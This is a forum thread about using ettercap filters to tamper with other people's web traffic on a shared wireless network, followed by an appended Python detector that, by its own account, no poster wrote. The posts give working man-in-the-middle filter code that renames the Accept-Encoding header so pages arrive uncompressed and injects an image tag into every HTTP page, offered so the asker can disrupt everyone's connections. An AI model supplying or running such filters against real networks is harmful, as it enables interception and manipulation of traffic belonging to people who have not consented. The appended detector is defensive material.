
Thread: can someone help me with ettercap

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    2


    Hi all

    I want some help if it's possible.

    Is it possible with the ettercap filter to give everybody in my wlan a sign like "time to go to bed guys" and, with a little delay, kill the connections?

    And if yes, how would I do that?

    I found this:
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Rubbish!");
            # note: replacement string is same length as original string
            msg("zapped Accept-Encoding!\n");
        }
    }
    if (ip.proto == TCP && tcp.src == 80) {
        # inner quotes must be escaped inside the filter string
        replace("img src=", "img src=\"time to go to bed\" ");
        replace("IMG SRC=", "img src=\"time to go to bed\" ");
        msg("Filter Ran.\n");
    }

    Do I have to tweak this to make it happen?

    thx

    and sorry for my bad English

  2. #2
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    I'll go ahead and throw you a cookie... this filter will put whatever source you want at the top of each page...

    Code:
    # requests to port 80: rename the header so the server replies uncompressed
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Nothing!");
        }
    }

    # responses from port 80: append the image tag after the closing title tag
    if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, "</title>")) {
            replace("</title>", "</title><img src=\"http://www.meandmyspace.com/files/en/comments1/good.night/bed_time.gif\" />");
            msg("script injected");
        }
    }
    compile that and then launch ettercap...

  3. #3
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629


    Quote Originally Posted by BigMac View Post
    I'll go ahead and throw you a cookie... this filter will put whatever source you want at the top of each page...
    That assumes every HTML document contains a TITLE tag, which is not mandatory. Also you'd be changing the length of the payload so the checksums on the packets will be borked (though perhaps HTTP only cares if the headers are futzed...you'd have to read some RFCs to find out).

    PS > Yes I know "borked" and "futzed" aren't real words but I like them anyway
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213


    Quote Originally Posted by thorin View Post
    That assumes every HTML document contains a TITLE tag, which is not mandatory. Also you'd be changing the length of the payload so the checksums on the packets will be borked (though perhaps HTTP only cares if the headers are futzed...you'd have to read some RFCs to find out).

    PS > Yes I know "borked" and "futzed" aren't real words but I like them anyway
    If you got time to spare, find me a site that is not affected by this filter and I'll also throw you a cookie lol
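
A defender-side check for the two effects discussed in this thread, added here as an example and not written by any of the posters: it flags a request whose `Accept-Encoding` header was overwritten with a same-length name, and a response whose body no longer matches its declared `Content-Length`. The function names and sample messages are constructed for illustration, and it assumes non-chunked HTTP/1.x traffic in which the rewrite leaves `Content-Length` untouched.

```python
import re

TARGET_LEN = len("Accept-Encoding")  # 15; "Accept-Rubbish!" and "Accept-Nothing!" match it
STANDARD = {"accept-language", "accept-datetime"}  # real 15-character Accept-* headers
CODING = re.compile(r"\b(gzip|deflate|br|zstd|identity)\b", re.I)

def parse_message(raw: bytes):
    """Split a raw HTTP/1.x message into ([(name, value), ...], body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")[1:]  # drop the start line
    headers = [tuple(p.strip() for p in ln.split(":", 1)) for ln in lines if ":" in ln]
    return headers, body

def renamed_accept_encoding(raw_request: bytes):
    """Return the header name that looks like an overwritten Accept-Encoding, else None."""
    headers, _ = parse_message(raw_request)
    if any(name.lower() == "accept-encoding" for name, _ in headers):
        return None
    for name, value in headers:
        low = name.lower()
        if (len(name) == TARGET_LEN and low.startswith("accept-")
                and low not in STANDARD and CODING.search(value)):
            return name
    return None

def body_length_delta(raw_response: bytes):
    """Body bytes received minus declared Content-Length; None if none is declared."""
    headers, body = parse_message(raw_response)
    for name, value in headers:
        if name.lower() == "content-length" and value.isdigit():
            return len(body) - int(value)
    return None

# Constructed sample traffic (not captured from a real network).
CLEAN_REQUEST = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
                 b"Accept-Encoding: gzip, deflate\r\nAccept-Language: pt-BR\r\n\r\n")
TAMPERED_REQUEST = CLEAN_REQUEST.replace(b"Accept-Encoding", b"Accept-Rubbish!")
ORIGINAL_BODY = b"<html><head><title>t</title></head><body>hi</body></html>"
ADDED = b'<img src="placeholder.gif" />'
TAMPERED_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                     b"Content-Length: %d\r\n\r\n" % len(ORIGINAL_BODY)
                     + ORIGINAL_BODY.replace(b"</title>", b"</title>" + ADDED))

if __name__ == "__main__":
    print(renamed_accept_encoding(TAMPERED_REQUEST), body_length_delta(TAMPERED_RESPONSE))
```

A non-zero delta or a returned header name is a hint of in-path modification, not proof; serving the site over HTTPS removes the plaintext these filters depend on.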
